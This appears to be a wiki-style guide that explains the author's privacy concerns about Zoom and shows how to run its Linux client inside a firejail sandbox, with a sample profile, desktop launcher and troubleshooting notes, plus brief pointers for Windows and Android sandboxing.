  • Recently SpaceX has banned Zoom because of privacy concerns, see here for details.

  • Zoom has close links with China. Even though the intellectual property, management and marketing are based in the USA, many if not most developers and engineers are bsed in China (see ​Form S-1 registration statement). This can potentially lead to serious privacy and cybersecurity issues, given the Chinese regime tightening of Internet regulation (censorship, privacy etc.). One example is ​MLPS 2.0 legislation, 2019 mandating China residents and any foreign companies unrestricted access to user data. (In China, Zoom has a network of agents acting under different names but using the same platform. )

Updates: More on Zoom problems

How to increase privacy and security of using Zoom on Linux

Sandboxing. On the Linux platform, one solution is always to run Zoom videoconferencing software only in a limited sandbox. Then, Zoom client would not have access to user's files and other processes running on the system.

  • Update: This recipe works for Zoom v. 3.5.361645.0301, but not for some later versions, e.g. 3.5.374815.0324, see update below on this.

Disable any unauthorized update/upgrade of Zoom client. Do not install Zoom software via the standard reopository. Use static tar.gz archive instead. Select Other Linux OS for installation. Uncompress the static distribution in a safe directory. Disadvantage of this is that update is only manual, check out Zoom web site for new releases and read changelog. But advantage is that zoom cannot silently install any unauthorized update or software on the system.

It also makes sense to register at Zoom with the institutional email but separate password, so Zoom does not use the main institutional login (SSO login). This might help against credentials leak in case of Zoom software vulnerability. Using the institutional email to register would ensure Zoom is registered as "licensed."

Install firejail sandboxing.https://firejail.wordpress.com/:

sudo apt install firejail.

  • Firejail is a SUID program that reduces the risk of security breaches by restricting the running environment of untrusted applications using Linux namespaces and seccomp-bpf. ... Firejail can sandbox any type of processes: servers, graphical applications, and even user login sessions. The software includes security profiles for a large number of Linux programs: Mozilla Firefox, Chromium, VLC, Transmission etc. To start the sandbox, prefix your command with “firejail.”

Make a configuration file for Zoom in .config/firejail/. Here is the configuration file named as the main Zoom run executable: ZoomLauncher.profile (given the running executable is ZoomLauncher):

# Note: to delete all firejail profiles for all local trusted apps
#  run sudo firecfg --clean
# ----------------------------------------------------------------
# Duplication of zoom configs in noblacklist and whitelist
# sections fixes login credentials no save problem:
noblacklist ${HOME}/.config/zoomus.conf
noblacklist ${HOME}/.zoom
include /etc/firejail/disable-common.inc
include /etc/firejail/disable-devel.inc
include /etc/firejail/disable-programs.inc
include /etc/firejail/disable-passwdmgr.inc
whitelist ${HOME}/bin/zoom
whitelist ${HOME}/.config/zoomus.conf
whitelist ${HOME}/.zoom
whitelist ${HOME}/.cache/zoom
whitelist ${HOME}/downloads
include /etc/firejail/whitelist-common.inc
caps.drop all
netfilter
nodvd
nonewprivs
noroot
notv
protocol unix,inet,inet6
seccomp
private-tmp
# Needed for latest versions of Zoom and perhaps certain other Qt/QML apps
env QML_DISABLE_DISK_CACHE=1

Now Zoom client can be started from the firejail sandbox:

firejail /path_to_safe_install_location/bin/zoom/ZoomLauncher

To make it possible to use standard graphical menus, one need to make a zoom.desktop startup file in the user's directory .local/share/applications. The Exec entry of the file must include the firejail-based startup:

[Desktop Entry]
Name=Zoom Desktop [Jailed]
GenericName=Zoom videoconferencing
Comment=Zoom Desktop Client jailed
Exec=firejail /path_to_safe_install_location/bin/zoom/ZoomLauncher %f
Icon=zoom.png
Terminal=false
Type=Application
Categories=Network;Internet;Education;Qt;
X-SuSE-translate=false

Firejail caveats

Firejail can start serving all user's applications in its jail, which is often too restrictive (e.g. settings are not saved).

  • To force reconfiguring all application to run in firejail do (do not do this if you are unsure) this:

    sudo firecfg

  • To disable configuring all local applications to run in jail, do this:

    sudo firecfg --clean

  • Do this (sudo firecfg --clean) if you have problems starting applications after installing firejail.

  • To check if an application is by default starting in a jail, run it from the terminal. If terminal shows several lines like Reading profile /etc/firejail/disable-common.inc then the application runs in a jail.

A newer version of Zoom client (3.5.374815.0324) refused to run in a jailed environment and hanged.

A workaround for running recent Zoom in jail:

add the below line env QML_DISABLE_DISK_CACHE=1

to the firejail config file.

  • QML_DISABLE_DISK_CACHE Disables the disk cache and forces re-compilation from source for all QML and JavaScript files. (from QML Documentation)

How to increase privacy and security of using Zoom on Microsoft Windows

Here is a link on sandbox in Windows 10: How to use Windows sandbox.

I have not tested how this works.

Android sandbox

For Android, one solution is to use the open source ​Shelter application, then mobile Zoom can run in a secure container.

I have been running several programs that I do not like to give access to my data within Shelter. It works fine for me.

Advantages:

  • Contacts (address book) are not leaked to Zoom if a separate address book is used within shelter

  • All apps can be frozen to avoid them run all the time at the background, this reduces the chances of data leaks as well as battery drain. Freezing can be done automatically, after timeout.

Links